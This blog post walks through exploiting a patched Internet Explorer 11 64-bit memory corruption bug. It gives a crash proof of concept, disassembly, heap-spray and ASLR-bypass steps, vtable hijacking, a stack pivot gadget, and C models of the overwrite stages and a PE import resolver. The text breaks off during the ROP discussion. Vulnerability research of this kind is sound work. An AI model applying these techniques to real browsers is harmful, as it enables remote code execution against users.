Wednesday, November 6, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here was patched by Microsoft in the October 2013 security update.

Earlier this year, Microsoft announced several security bounty programs one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I just became a father right before the bounty programs started so I had other preoccupations) I haven’t actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version so I decided to try to develop an exploit later. In this post, I’ll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.

When setting out to develop the exploit I didn't strive to make a 100% reliable exploit (The specifics of the bug would have made it difficult and my goal was to experiment with the new platform and not make the next cyber weapon), however I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows, because 32-bit would be cheating: many exploit mitigation techniques (such as heap base randomization) aren't really effective in a 32-bit address space. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass)

One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.

To force IE into 64-bit mode on the desktop for exploit development, I forced IE into single-process mode (the TabProcGrowth registry key). Note that this was used for debugging only; if used for browsing random pages it makes IE even less secure, because it disables IE’s sandbox.

The bug

A minimal sample that triggers the bug is shown below.

<script>
function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
 t.focus();
}
</script>
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in the MSHTML!Layout::ContainerBox::ContainerBox function while attempting to read from an unmapped address (the ???????????????? in the debugger output) at rax + rdx*8. rax actually points to valid memory containing a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of the ContainerBox::ContainerBox function to see where this value comes from and what could be done if an attacker controlled the memory at rax + 0xFFFFFF8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
...
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
...
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
...
00007ffb`dac002db 410fbffd        movsx   edi,r13w
...
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of the crash comes, after several assignments, from ebp, which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that 0xFFFFFFFF (-1) is the initial value of a variable used as an index into the CFormatCache. Later in the code a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and, if it is set, the index is copied from the CTreeNode object (movzx r13d, word ptr [rdi+68h]). If the flag is not set (as is the case in the PoC), the initial value is used. The 16-bit index is then sign-extended (movsx edi, r13w) and split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). The upper index (rdx shifted right by 7, which will be 0x1ffffff) is multiplied by 8 (the size of a pointer), the result is added to rax and the qword at that address is loaded into rax; this is the read that faults in the crash above. The lower index (ecx & 0x7f, which will be 0x7f) is multiplied by 24 (presumably the size of a CCharFormat element) and the lea computes rax + that offset into rdx (note that lea only computes an address, it does not load memory). Finally, and this is the part relevant for exploitation, the dword at [rdx+0Ch] is loaded, incremented and written back to [rdx+0Ch].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
} 
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24
formatCache[index_hi][index_lo].some_number++; 

For practical exploitation purposes, what happens is this: a pointer to valid memory (the CFormatCache pointer) is increased by 0x0FFFFFF8 (256MB) and the value at this address is treated as another pointer. Let’s call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + 0xBF4) will be increased by 1 (note: 0xBF4 is computed as 0x7F * 3 * 8 + 0x0C).
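The index arithmetic above, as an added example in C (not the author's code): a register-level model of the instruction sequence that shows how the -1 index turns into the two offsets, next to the bounds check the code lacks. The strides (8 and 24) and the counter offset (0x0C) are taken from the disassembly; the cache dimensions passed to the check are illustrative, not IE's.

```c
#include <stdint.h>
#include <stdio.h>

/* Strides recovered from the disassembly: the outer table holds 8-byte
   pointers, the inner table holds 24-byte entries, and the counter that
   gets incremented sits at +0x0C inside an entry. */
#define OUTER_STRIDE   8u
#define INNER_STRIDE   24u
#define COUNTER_OFFSET 0x0Cu

typedef struct {
    uint64_t outer_offset; /* added to the CFormatCache pointer to form P1 */
    uint64_t inner_offset; /* added to P2, the pointer loaded from P1      */
} cache_offsets;

/* Register-level model of the sequence
     movsx edi,r13w ; mov ecx,edi ; mov edx,edi ; shr rdx,7 ; and ecx,7Fh
     mov rax,[rax+rdx*8] ; lea rcx,[rcx+rcx*2] ; lea rdx,[rax+rcx*8] ; ... [rdx+0Ch]
   r13w is the 16-bit cache index: 0xFFFF (the -1 from ebp) when the CTreeNode
   flag is clear, the node's own index otherwise. */
cache_offsets compute_offsets(uint16_t r13w)
{
    int32_t  edi = (int16_t)r13w;   /* movsx: 0xFFFF becomes 0xFFFFFFFF          */
    uint64_t rdx = (uint32_t)edi;   /* a 32-bit mov zero-extends into rdx        */
    uint32_t ecx = (uint32_t)edi;
    rdx >>= 7;                      /* index_hi: 0x01FFFFFF for -1               */
    ecx &= 0x7Fu;                   /* index_lo: 0x7F for -1                     */
    cache_offsets o;
    o.outer_offset = rdx * OUTER_STRIDE;                            /* 0x0FFFFFF8 */
    o.inner_offset = (uint64_t)ecx * INNER_STRIDE + COUNTER_OFFSET; /* 0xBF4      */
    return o;
}

/* The check the code lacks: an unassigned (-1) index must never be used, and
   an assigned one must stay inside the cache's dimensions (the counts are
   supplied by the caller here and are illustrative only). */
int index_in_bounds(int32_t cache_index, uint32_t outer_count, uint32_t inner_count)
{
    if (cache_index < 0) return 0;
    uint32_t hi = (uint32_t)cache_index >> 7;
    uint32_t lo = (uint32_t)cache_index & 0x7Fu;
    return hi < outer_count && lo < inner_count;
}

int main(void)
{
    cache_offsets bad = compute_offsets(0xFFFF); /* the PoC path: flag clear      */
    cache_offsets ok  = compute_offsets(5);      /* a legitimately assigned index */
    printf("index -1: P1 = cache + 0x%llx, increment at P2 + 0x%llx\n",
           (unsigned long long)bad.outer_offset, (unsigned long long)bad.inner_offset);
    printf("index  5: P1 = cache + 0x%llx, increment at P2 + 0x%llx\n",
           (unsigned long long)ok.outer_offset, (unsigned long long)ok.inner_offset);
    printf("in bounds? -1: %d, 5: %d\n",
           index_in_bounds(-1, 1, 128), index_in_bounds(5, 1, 128));
    return 0;
}
```

The zero-extension on `mov edx,edi` is what makes the shifted upper index 0x1FFFFFF rather than a negative number, so the "bad" pointer lands 256MB above the cache rather than below it; that direction is what makes the spray in the next section possible.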

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that when BF4 is added to it, an address of something interesting (e.g. string or array length) is obtained. An “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for a 64-bit process with full ASLR, we won’t know, or be able to guess, the address of an “interesting” object. We certainly won’t be able to fill the address space of a 64-bit process, and the heap base will be randomized, making the addresses of objects on the heap unpredictable.

Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address plus 0x0FFFFFF8 (256MB). And when we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256MB of memory we can make P1 land inside our spray and thereby set P2 to an arbitrary value.

So to conclude, despite significantly larger address space in 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address + a large offset. As this is a typical behavior for bounds checking vulnerabilities, it’s not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.

Although heap spraying is often avoided in modern exploits in favor of the more reliable alternatives, given a large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it’s a pretty good value as far as heap spraying goes. Not too large to cause memory exhaustion and not too small to cause major reliability issues (other than those from using heap spraying in the first place).

Look Ma, no Flash

But the problem of not being able to guess an address of an interesting object still remains, and thus the question is, what do we heap spray with? Well, instead of heap spraying with the exact values, we can spray with pointers instead. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we’ll spray with an address of some object and try to make this address + 0xBF4 point to something of interest.

So what should “something of interest” be? The first thing I tried is a length of a JavaScript string as in here. And although I was able to align the stars to overwrite higher dword of a qword containing a string length, a problem arose: JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword aligned and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to higher dword in a qword-aligned memory. So an interesting value needs to either be 64-bit or not qword aligned.

Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB, as (assuming a qword-aligned address) we are incrementing the higher dword. To control the content at this address we would need another heap spray of ~4GB of data, and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran the Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM, so I decided to drop this idea and look at alternatives.

In several recent exploits used in the wild, a length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let’s take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with explanation of some of the fields is shown below. Note that the actual array content may be split across several buffers.



offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it’s not necessary for understanding the exploit, here’s also an example String object with explanation of some of the fields.



offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.

This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.




We’ll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array is the same string object. We’ll also get memory aligned in such a way that, at offset 0xBF4 from the start of the string, there will be a part of a JavaScript array that holds the value we want to overwrite.

You might wonder why I heap sprayed with pointers to a String and not an Array object. The reason is that the String object is much smaller (32 bytes vs. 128 bytes), so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in the heap spray. Since an Array object is 4 times the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4) we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess gives a success probability of 1/4, while a try/retry approach gives a success probability of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in descending order). An even better approach would be to disclose the string offsets by first aligning memory in a way that puts something readable at offset 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, it isn’t implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you achieve such alignment.

In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let’s first take some time to examine how it’s possible to heap spray in IE11 and get a correct object alignment on heap with a high reliability.

Firstly, heap spraying: While Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It’s possible to spray both with pointers (as seen above) as well as with absolute values by e.g. creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it’s not necessary and, given the current Array implementation and improved speed over the predecessors, JavaScript arrays might just be the object of choice to implement heap spraying in IE in the future.

Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.

I’ll shortly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observation of the behavior and not reverse-engineering the code, so I might have made some wrong conclusions, but it works as described for the purposes of the given exploit.

The space for the JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks are allocated and there is nothing preventing these blocks from being right next to one another (so a theoretical overflow in one block could write into another).

These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So for example, in this exploit where we have String and Array objects of size 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some of them will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-size blocks than the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, small arrays like the 5-element ones in the exploit).

The allocation order of objects inside a given bin is sequential. That means that, e.g. if we create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other with the first one having the lowest address, followed by the second followed by the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger increases this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it lets us break ASLR: the 5-element buffer is stored inside the Array object, so reading past it returns fields of the Array object that follows in memory, including its data pointer (arrarr[i][16] and arrarr[i][17] in the exploit code), which gives us a precise heap address.

Knowing that address, we can repeat the heap spray, but this time we’ll spray with exact values (I used an Array of integers to spray with them). The value we spray with is the address of the buffer capacity field of that neighbouring array decreased by 0xBF1, so that the spray value + 0xBF4 is the address of the highest byte of the 4-byte capacity (incrementing that byte adds 0x01000000 to the capacity). After the buffer capacity has been overwritten, we’ll be able to both read and write data past the end of the JS Array’s buffer.
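Both overwrite stages, as an added C model (not the exploit's code) that covers the alignment argument from the previous section and the re-spray value above. It assumes what the post describes: 32-byte String and 128-byte Array objects packed without metadata in 0x1000 bins (so Array objects are 128-aligned), the Array field offsets listed earlier, and a little-endian layout. The arena is a constructed stand-in for a bin, not IE memory, and one call to trigger_increment() models one increment of the bug.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Field offsets of a jscript9 Array object and of its in-object buffer, as
   listed in the post. */
#define ARRAY_OBJ_SIZE   0x80u
#define STRING_OBJ_SIZE  0x20u
#define BUF_FIRST_INDEX  0x50u
#define BUF_COUNT        0x54u   /* number of elements currently in the buffer */
#define BUF_CAPACITY     0x58u
#define BUG_OFFSET       0xBF4u

/* The primitive the bug provides: a 32-bit increment at P2 + 0xBF4, where P2
   is whatever pointer the heap spray placed at P1. */
void trigger_increment(uint8_t *p2)
{
    uint32_t v;
    memcpy(&v, p2 + BUG_OFFSET, sizeof v);
    v += 1;
    memcpy(p2 + BUG_OFFSET, &v, sizeof v);
}

/* Stage 1: spraying with the address of a 32-byte String. With Arrays packed
   128-aligned in their bin (assumption), the increment lands on one of four
   offsets inside some Array, depending on the String's position modulo 128. */
uint32_t landing_offset(uint64_t string_addr)
{
    return (uint32_t)((string_addr + BUG_OFFSET) % ARRAY_OBJ_SIZE);
}

int hits_element_count(uint64_t string_addr)
{
    return landing_offset(string_addr) == BUF_COUNT;
}

/* Stage 2: the value to spray with once buffer_addr (the data pointer read
   through the stage-1 over-read) is known. value + 0xBF4 must be the top byte
   of the 4-byte capacity, hence +8 (capacity follows the buffer header) and +3. */
uint64_t stage2_spray_value(uint64_t buffer_addr)
{
    return buffer_addr + (BUF_CAPACITY - BUF_FIRST_INDEX) - BUG_OFFSET + 3;
}

/* Constructed arena standing in for a bin: the target Array sits at +0x1000 so
   that P2 = target + 0x54 - 0xBF4 still lies inside the allocation. */
static uint8_t *make_arena(uint32_t *target_off)
{
    uint8_t *arena = calloc(0x2000, 1);
    if (!arena) return NULL;
    *target_off = 0x1000;
    uint32_t five = 5;                                     /* new Array(1,2,3,4,5) */
    memcpy(arena + *target_off + BUF_COUNT,    &five, sizeof five);
    memcpy(arena + *target_off + BUF_CAPACITY, &five, sizeof five);
    return arena;
}

/* Five triggers aimed at the element count; returns the count afterwards. */
uint32_t simulate_stage1(void)
{
    uint32_t off, count = 0;
    uint8_t *arena = make_arena(&off);
    if (!arena) return 0;
    uint8_t *p2 = arena + off + BUF_COUNT - BUG_OFFSET;    /* what the spray points at */
    for (int i = 0; i < 5; i++) trigger_increment(p2);
    memcpy(&count, arena + off + BUF_COUNT, sizeof count);
    free(arena);
    return count;
}

/* One trigger aimed at the top byte of the capacity; returns the capacity. */
uint32_t simulate_stage2(void)
{
    uint32_t off, cap = 0;
    uint8_t *arena = make_arena(&off);
    if (!arena) return 0;
    uint64_t buffer_addr = (uint64_t)(uintptr_t)(arena + off + BUF_FIRST_INDEX);
    uint8_t *p2 = (uint8_t *)(uintptr_t)stage2_spray_value(buffer_addr);
    trigger_increment(p2);
    memcpy(&cap, arena + off + BUF_CAPACITY, sizeof cap);
    free(arena);
    return cap;
}

int main(void)
{
    printf("String at +0x60 in a 128-byte window hits Array offset 0x%x\n", landing_offset(0x60));
    printf("stage 1: element count after 5 triggers = %u\n", simulate_stage1());
    printf("stage 2: capacity after 1 trigger = 0x%08x\n", simulate_stage2());
    return 0;
}
```

Only one of the four String phases (0x60 modulo 128) reaches the count field at 0x54, which is the 1/4 figure from the previous section; the other three land on 0x74, 0x14 and 0x34 and are the cases the retry logic has to distinguish.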

From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.

We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.

We can get control over RIP by overwriting a vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protections. However note that, having arbitrary memory disclosure, even if vtguard was present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we’ll want to construct a ROP chain in order to defeat DEP. As we don’t control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, in x64 code stack pivot gadgets are much less common than in x86 code. On x86, xchg eax,esp; ret; is just 2 bytes (94 C3), so there are many unintended occurrences of that sequence. On x64, xchg rax,rsp; ret; is 3 bytes (48 94 C3), which makes it much less common. Having not found it (or any other “clean” stack pivot gadget) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found the stack pivot sequence shown below, which isn’t very clean but does the trick assuming both rax and rcx point to readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won’t cause a crash so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, an address of (larger) mshtml.dll module can be easily obtained using memory disclosure by pushing a mshtml object into a JS array object we can read and then following references from the array to mshtml object and its vtable.

After control of the stack is gained, we can call VirtualProtect to make a part of the heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments on the stack and return into VirtualProtect, right? Well, no. 64-bit Windows uses a different calling convention than 32-bit: the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed in the registers RCX, RDX, R8 and R9, in that order. So we need some additional gadgets to load the correct argument into the correct register:
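Resolving VirtualProtect through the import directory by name, instead of the fixed IAT offset the exploit's PE32+ parsing uses, as an added example in C (not the exploit's code). The walker treats the image as already mapped (RVA equals buffer offset, which holds for a loaded module read through the disclosure primitive) and follows the same path as the exploit: e_lfanew, DataDirectory[1] at optional-header offset 120, then the import descriptors. The image parsed here is constructed, with a single KERNEL32.dll descriptor, two imports and placeholder slot values.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void wr64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }

/* Case-insensitive compare of a NUL-terminated name at rva against s, never
   reading past len. */
static int name_eq(const uint8_t *img, size_t len, uint32_t rva, const char *s)
{
    for (size_t i = 0;; i++) {
        if ((size_t)rva + i >= len) return 0;
        int a = tolower(img[rva + i]), b = tolower((unsigned char)s[i]);
        if (a != b) return 0;
        if (a == 0) return 1;
    }
}

/* Returns the RVA of the IAT slot for dll!func in a mapped PE32+ image, or 0. */
uint32_t find_import_slot(const uint8_t *img, size_t len, const char *dll, const char *func)
{
    if (len < 0x40 || rd16(img) != 0x5A4D) return 0;                  /* "MZ", as the exploit checks */
    uint32_t pe = rd32(img + 0x3C);                                   /* e_lfanew */
    if ((size_t)pe + 4 + 20 + 0xF0 > len || rd32(img + pe) != 0x4550) return 0; /* "PE\0\0" */
    const uint8_t *opt = img + pe + 4 + 20;                           /* optional header */
    if (rd16(opt) != 0x20B) return 0;                                 /* PE32+ only */
    uint32_t imp = rd32(opt + 112 + 8);                               /* DataDirectory[1].VirtualAddress */
    if (imp == 0) return 0;
    for (uint32_t d = imp; (size_t)d + 20 <= len; d += 20) {          /* IMAGE_IMPORT_DESCRIPTOR */
        uint32_t oft = rd32(img + d), name = rd32(img + d + 12), ft = rd32(img + d + 16);
        if (name == 0 && ft == 0) break;                              /* terminating descriptor */
        if (oft == 0 || !name_eq(img, len, name, dll)) continue;      /* need an INT to look up names */
        for (uint32_t i = 0; (size_t)oft + 8 * i + 8 <= len; i++) {
            uint64_t e = rd64(img + oft + 8 * i);                     /* 8-byte thunks in PE32+ */
            if (e == 0) break;
            if (e >> 63) continue;                                    /* import by ordinal */
            if (name_eq(img, len, (uint32_t)e + 2, func))             /* skip the 2-byte hint */
                return ft + 8 * i;                                    /* matching IAT slot */
        }
    }
    return 0;
}

/* The value the exploit actually wants: the resolved address stored in the slot. */
uint64_t resolve_import(const uint8_t *img, size_t len, const char *dll, const char *func)
{
    uint32_t slot = find_import_slot(img, len, dll, func);
    return (slot && (size_t)slot + 8 <= len) ? rd64(img + slot) : 0;
}

/* Constructed image (not real mshtml.dll): one KERNEL32.dll descriptor importing
   VirtualAlloc (slot 0) and VirtualProtect (slot 1); slot values are placeholders. */
void make_sample_pe(uint8_t *img, size_t len)
{
    memset(img, 0, len);
    wr16(img, 0x5A4D);           wr32(img + 0x3C, 0x80);
    wr32(img + 0x80, 0x4550);    wr16(img + 0x84, 0x8664);  /* Machine: AMD64 */
    wr16(img + 0x94, 0xF0);                                 /* SizeOfOptionalHeader */
    uint8_t *opt = img + 0x98;
    wr16(opt, 0x20B);                                       /* PE32+ magic */
    wr32(opt + 112 + 8, 0x200);  wr32(opt + 112 + 12, 40);  /* import directory RVA/size */
    wr32(img + 0x200, 0x300);                               /* OriginalFirstThunk (INT) */
    wr32(img + 0x20C, 0x400);                               /* Name */
    wr32(img + 0x210, 0x500);                               /* FirstThunk (IAT) */
    memcpy(img + 0x400, "KERNEL32.dll", 13);
    memcpy(img + 0x422, "VirtualAlloc", 13);                /* hint at 0x420, name at 0x422 */
    memcpy(img + 0x442, "VirtualProtect", 15);
    wr64(img + 0x300, 0x420);    wr64(img + 0x308, 0x440);
    wr64(img + 0x500, 0x7FF800001000ULL); wr64(img + 0x508, 0x7FF800002000ULL);
}

int main(void)
{
    uint8_t img[0x600];
    make_sample_pe(img, sizeof img);
    printf("VirtualProtect slot RVA 0x%x, value 0x%llx\n",
           find_import_slot(img, sizeof img, "kernel32.dll", "VirtualProtect"),
           (unsigned long long)resolve_import(img, sizeof img, "kernel32.dll", "VirtualProtect"));
    return 0;
}
```

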